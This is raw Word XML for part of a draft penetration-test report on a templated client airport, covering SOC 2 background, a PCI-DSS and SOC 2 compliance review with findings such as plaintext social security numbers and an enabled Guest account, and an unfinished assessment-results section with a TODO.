        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000A7" w14:textId="664DC479">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645194" w:id="23"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        </w:rPr>
        <w:t>4.1.2 SOC 2 Cybersecurity Compliance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000A8" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Developed by the American Institute of CPAs (</w:t>
      </w:r>
      <w:hyperlink r:id="Re950d29b7624496e">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>AICPA</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">), SOC 2 defines criteria for managing customer data based on five “trust service principles”—security, availability, processing integrity, </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>confidentiality</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> and privacy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000000A9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000AA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">SOC 2 security principles focus on preventing the unauthorized use of assets and data handled by the organization. This principle requires organizations to implement access controls to prevent malicious attacks, unauthorized deletion of data, misuse, unauthorized </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>alteration</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> or disclosure of company information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000000AB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000AC" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Although a full SOC 2 compliance audit can only be performed by an AICPA certified accountant, the following checklist </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>provides a way for an organization</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> to ensure they are as prepared as possible before an audit is conducted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000000AD" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000AE" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Access controls</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>—logical and physical restrictions on assets to prevent access by unauthorized personnel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000AF" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Change management</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>a controlled</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> process for managing changes to IT systems, and methods for preventing unauthorized changes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000B0" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>System operations</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">—controls that can </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>monitor</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> ongoing operations, </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>detect</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> and resolve any deviations from organizational procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000B1" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Mitigating risk</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">—methods and activities that allow the organization to </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>identify</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> risks, as well as respond and mitigate them, while addressing any </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>subsequent</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> business.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000000B2" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000B5" w14:textId="2D9349BC">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC 2 Cybersecurity Compliance information sourced from: </w:t>
      </w:r>
      <w:hyperlink r:id="R17f8fecdf0d14e2e">
        <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.checkpoint.com/cyber-hub/cyber-security/what-is-soc-2-compliance/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000B6" w14:textId="4A886403">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645195" w:id="24"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>4.2 Compliance Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000B7" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">For each vulnerability listed below, we have included a section that </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>indicates</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> which compliance standard, if any, was violated. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="084FC43F" w14:textId="7C258975">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">However, in addition, we felt as though it was worth putting together a brief overview of {company.name}’s current standing </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>in regards to</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> the various compliance standards the airport should be following. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000BA" w14:textId="7F111B3C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645196" w:id="25"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        </w:rPr>
        <w:t>4.2.1 PCI-DSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000BB" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Standards implemented well:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000BC" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">{company.name} has </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>a firewall</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> system in place, and all cardholder data is segmented off and is not freely accessible from the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000BD" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Continuing to contract out to various companies to get penetration tests to verify the integrity of the security systems is </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>a great way</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> to stay in compliance with the PCI-DSS requirement to conduct security audits.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000BE" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">{company.name} is already working to conduct training with {company.name} employees on how to follow best practices in </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>maintaining</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> security, and is working with their IT department to implement a patching protocol for bugs found in </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000BF" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Areas for improvement:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000C0" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">The Guest account was enabled on the Windows network, and it was able to access </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>important information</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> across the network. This will need to be disabled </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>in order to</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>maintain</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> PCI-DSS compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000C1" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Some sensitive data, such as social security numbers, were stored in plain text in databases. These should be encrypted at rest.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000C2" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Transmission of social security numbers and other sensitive information took place over HTTP, which does not encrypt </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>the data</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>. The applications that deal with sensitive data should be upgraded to use HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000C3" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>There was no antivirus software on any of the systems, which is a major issue in terms of PCI-</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>DSS, and</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> is an enormous point of risk in general. In addition, many of the operating systems and applications were running out-of-date versions. These will need to be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000C4" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Some sensitive data, such as social security numbers, were returned to users during web queries where the information was not </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>required</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>. These apps should be reworked to only return information that is necessary to complete the requested operation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000C5" w14:textId="451D6032">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645197" w:id="26"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        </w:rPr>
        <w:t>4.2.2 SOC 2 Cybersecurity Compliance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000C6" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Standards implemented well:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000C7" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>In general, there were good logical and physical restrictions in place for preventing users from accessing resources they did not need access to. Regular user accounts could not RDP into other systems, and they could not access files from other users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000C8" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>To be improved:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000C9" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">We did not see evidence of a </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>change</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> management system for IT services. We always recommend having a place where IT documents every change made to the network </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>in order to</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> provide better clarity into how the system works. This also prevents conflicting changes from being made, which is a major way vulnerabilities are introduced.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="644564D2" w14:textId="337C41C6">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000CB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645198" w:id="27"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000CC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645199" w:id="28"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Key </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Strengths</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeStart w:id="2088395850"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>TODO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:commentRangeEnd w:id="2088395850"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="2088395850"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="000000CF" w14:textId="44DF33E6">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>The various subnets were appropriately segmented from one another, with the user subnet being completed inaccessible from the outside. The Linux system security was also strongly protected, with many up-to-date software versions and complex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="000000D0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645200" w:id="29"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Key </w:t>
      </w:r>
      <w:commentRangeStart w:id="1115039105"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">Areas </w:t>
      </w:r>
      <w:commentRangeEnd w:id="1115039105"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1115039105"/>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Improvement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="000000D1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0FB6339A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
